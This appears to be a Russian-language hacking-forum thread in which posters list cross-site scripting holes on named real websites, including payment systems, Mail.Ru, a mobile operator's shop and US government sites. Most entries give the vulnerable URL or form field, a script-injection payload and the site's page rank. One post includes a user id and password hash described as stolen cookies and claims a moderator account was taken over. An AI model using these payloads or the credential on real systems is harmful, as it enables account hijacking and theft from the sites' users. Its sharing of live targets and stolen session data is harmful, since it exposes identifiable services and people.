http://www.bcb.gov.br/?id=MINUTES&ano=%3Cscript%3Ealert('XSS')%3C/script%3E Раздел сайта в DMOZ > Society > Government > Finance > Central_Banks ТИЦ90 PR8 P.S Надеюсь модераторы оставят
Активная XSS на Mail.Ru в теле письма. /readmsg_translate?id= Практически заюзать можно использовав getenv("HTTP_REFERER"); (shell_c0de, ну ты понял!) На выходе получаем активную XSS в теле письма, код которой можно украсть, но заюзать может только владелец XSS. Единственная проблема это символ #, после которой реферрер не передается, и который используется Mail.Ru для открытия писем в фрейме. ps. Подробно обьяснять не буду, кому надо, тот догонит).
intellectmoney.ru платежная система которая стоит вконтакте. ТИЦ: 160 PR: 3 Бага находится по адресу: https://intellectmoney.ru/ru/enter/user_paycards/index.php в названии карты ставим любой html код, фильтрация отсутствует к примеру можно выполнить <script>alert()</script>
XSS у webmoney! активная XXS уязвимость на сайте: merchant.webmoney.ru итак по порядку! 1. https://merchant.webmoney.ru нужно авторизовать WMID 2. перейти по ссылке: Настройки (https://merchant.webmoney.ru/conf/purses.asp) 3. выбрать произвольный кошелек и кликнуть по ссылке: настроить (ссылка вида: https://merchant.webmoney.ru/conf/purse.asp?p=ВАШ_КОШЕЛЕК) 4. в поля: Result URL, Success URL, Fail URL, вписать: ("><script>alert()</script>) 5. сохранить --------------------------------------------------- Администрации об этой сообшике сообщенно! возможно скоро прекратит свое существование ------------ UPD--------------------------------- админы вэбмани ответили, что это так и задумывалось =)))) пользуемся наздоровье
Крупный треккер Украины. Тиц 100,Я Rank 3/6,PR 5. http://pslan.kiev.ua/downloadit.php?id=171462&name=%3Ci%3Et00z%3C/i%3E Уязвим параметр name.Для просмотра нужна регистрация. Чтоб не регится,можем юзать уже краденые печеньки : Code: uid=403942 pass=672b01c07e1347405b5dd9127aecee24 ~ Акк модератора уже в наличии
Pentagon Library http://www.whs.mil/library/dir.html POST запросом в поле "Area Code" "><script>alert(/xss/)</script> U.S. Government Printing Office тута уже get уязвимо два параметра http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=<script>alert(/xss/)</script>&docid="><script>alert(/xss/)</script>
сайт- http://victorov.su/md5/ шифруем наш код в md5: "><script>alert();</script><" И теперь расшифровываем полученый хеш - a4c2307f111c68d97e8bb44ed7e9401c, и вуаля! Код исполняется, пример - http://victorov.su/md5/?md5e=&md5d=a4c2307f111c68d97e8bb44ed7e9401c
Code: http://www.fema.gov/library/viewRecord.do?id=%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E Google PR - 9 тИЦ - 180
http://www.salajeanul.ro/index.php?cmd=article Отсутствует фильтрация входных данных в полях формы комментирования Уязвимые поля
БГУ (Минск) http://phone.bsu.by/ Уязвимые поля: "ФИО" - "><script>alert(/1/)</script> "Подразделение" - "><script>alert(/1/)</script>
Active XSS http://www.ayda.ru/ Требуется регистрация. если лень делать временное мыло, то http://www.ayda.ru/stories/write_story.php Добавляем историю и не надо подтверждать регу. профиль http://www.ayda.ru/my/profile.php Уязвимое поле: * Имя: Vlad<script>console.log("asd")</script>
Active XSS https://spb.shop.megafon.ru/ Требуется регистрация. https://spb.shop.megafon.ru/setup/delivery_info.html Уязвимое поле - адрес
Провайдер Казахстана http://cabinet.megaline.kz/billing-dealer/restore-password.do Вводим в поле "Шаг 1": HTML: еб*нутый<h2>Мде. Еще провайдером называются...</h2> Совести Ну и результат: P.S. Еще года два назад заметил эту XSS, до сих пор живa
Еще один скидочный сервис от меня))) Active XSS: http://bigbuzzy.ru/ Уязвимость в Личном кабинете. В поле Имя и Фамилия( в самом кабинете фильтруются символы при выводе...а в акциях нет. Яндекс тИЦ (CY) 220 Alexa Rank 11,757 -9,013 Google PageRank (PR) 4
Active XSS http://www.directadvert.ru/user/ Яндекс тИЦ (CY) 190 Alexa Rank 1,697 -286 Google PageRank (PR) 5 Хосты 542,037 http://www.liveinternet.ru/stat/directadvert.ru/ Уязвимы все поля при создании рекламной компании.
Active XSS биржа трафика- http://www.alltraf.com/ (в определенных кругах - популярна и очень странно что тиц 0) При создании рекламной компании уязвимо поле с урлом. а вот и куки админке.
Active XSS Сайт продажи электронных билетов - достаточно поппулярный e-traffic.ru PR = 0 Тиц = 30 Админка тут - /admin/ Уязвимые поля: Имя = <script>alert('a4at')</script> Отчество = <script>alert('a4at')</script>
html5demos.com PR = 6 ТиЦ = 40 Множественные уязвимости: http://html5demos.com/postmessage http://html5demos.com/postmessage2 http://html5demos.com/storage Вставляем в поля Code: <img src='1231231' onerror='alert("hacked")'/> и радуемся! Вот ещё: http://html5demos.com/drag-anythingКопируем нашу ксс и переносим в поле для драг-н-дропа.